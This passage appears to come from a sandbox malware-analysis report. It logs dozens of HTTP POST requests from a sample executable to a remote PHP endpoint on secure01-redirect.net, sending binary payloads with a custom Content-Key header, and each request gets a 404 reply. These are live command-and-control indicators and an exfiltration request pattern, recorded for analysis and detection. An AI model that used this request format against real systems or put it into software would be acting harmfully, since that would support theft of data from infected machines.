              0 | 192.168.2.6 | 49769 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:07.260369062 CET | 1240 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 196
              Connection: close
              Jan 28, 2022 23:37:08.647847891 CET | 1240 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:49 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 15
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              1 | 192.168.2.6 | 49770 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:10.277966022 CET | 1241 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 196
              Connection: close
              Jan 28, 2022 23:37:12.345729113 CET | 1242 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:52 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 15
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              10 | 192.168.2.6 | 49783 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:39.408766985 CET | 1383 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:40.689152956 CET | 1384 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:21 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              11 | 192.168.2.6 | 49784 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:41.973819971 CET | 1384 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:43.403239012 CET | 1385 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:23 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              12 | 192.168.2.6 | 49787 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:44.786353111 CET | 1397 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:46.235904932 CET | 1468 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:26 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              13 | 192.168.2.6 | 49793 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:51.111628056 CET | 1514 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:52.495630026 CET | 1514 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:32 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              14 | 192.168.2.6 | 49795 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:55.089534044 CET | 1516 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:56.498845100 CET | 1537 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:36 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              15 | 192.168.2.6 | 49797 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:59.460407019 CET | 1545 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:00.863837957 CET | 1545 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:41 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              16 | 192.168.2.6 | 49802 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:02.169111967 CET | 3128 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:03.551551104 CET | 10282 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:44 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              17 | 192.168.2.6 | 49818 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:06.424436092 CET | 10554 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:07.849755049 CET | 10771 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:48 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              18 | 192.168.2.6 | 49830 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:10.077239037 CET | 10784 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:11.381908894 CET | 12486 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:51 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              19 | 192.168.2.6 | 49840 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:12.712441921 CET | 12493 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:14.111047983 CET | 12494 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:54 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              2 | 192.168.2.6 | 49771 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:37:14.709347010 CET | 1243 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:16.117796898 CET | 1343 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:56 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              20 | 192.168.2.6 | 49841 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:17.281043053 CET | 12494 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:18.654022932 CET | 12495 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:59 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              21 | 192.168.2.6 | 49842 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:20.171529055 CET | 12496 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:21.628648043 CET | 12496 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              22 | 192.168.2.6 | 49845 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:23.240806103 CET | 12504 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:24.676434040 CET | 12504 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:05 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              23 | 192.168.2.6 | 49850 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:27.482882977 CET | 12520 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:28.925374031 CET | 12521 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:09 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              24 | 192.168.2.6 | 49851 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:31.054519892 CET | 12521 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:38:32.352724075 CET | 12522 | IN | HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:12 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              25 | 192.168.2.6 | 49852 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 28, 2022 23:38:33.510654926 CET | 12523 | OUT | POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:35.007775068 CET   kBytes transferred: 12524   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:15 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 26   Source IP: 192.168.2.6   Source Port: 49854   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:37.134931087 CET   kBytes transferred: 12525   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:38.454946995 CET   kBytes transferred: 12534   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:19 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 27   Source IP: 192.168.2.6   Source Port: 49855   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:40.133790970 CET   kBytes transferred: 12535   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:41.392921925 CET   kBytes transferred: 12542   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:21 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 28   Source IP: 192.168.2.6   Source Port: 49862   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:42.445022106 CET   kBytes transferred: 12553   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:43.841937065 CET   kBytes transferred: 12567   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:24 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 29   Source IP: 192.168.2.6   Source Port: 49870   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:46.720808029 CET   kBytes transferred: 12578   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:48.177226067 CET   kBytes transferred: 12591   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:28 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 3   Source IP: 192.168.2.6   Source Port: 49773   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:17.458668947 CET   kBytes transferred: 1344   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:18.890583992 CET   kBytes transferred: 1344   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:59 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 30   Source IP: 192.168.2.6   Source Port: 49881   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:49.452650070 CET   kBytes transferred: 12601   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:50.674108982 CET   kBytes transferred: 12602   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:31 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 31   Source IP: 192.168.2.6   Source Port: 49882   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:52.315956116 CET   kBytes transferred: 12602   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:53.689454079 CET   kBytes transferred: 12603   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:34 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 32   Source IP: 192.168.2.6   Source Port: 49883   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:54.799525976 CET   kBytes transferred: 12604   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:56.145380974 CET   kBytes transferred: 12604   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:36 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 33   Source IP: 192.168.2.6   Source Port: 49885   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:38:57.255335093 CET   kBytes transferred: 12606   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:38:58.636996984 CET   kBytes transferred: 12613   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:39 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 34   Source IP: 192.168.2.6   Source Port: 49886   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:39:00.138022900 CET   kBytes transferred: 12613   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:39:01.668778896 CET   kBytes transferred: 12614   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:40:41 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
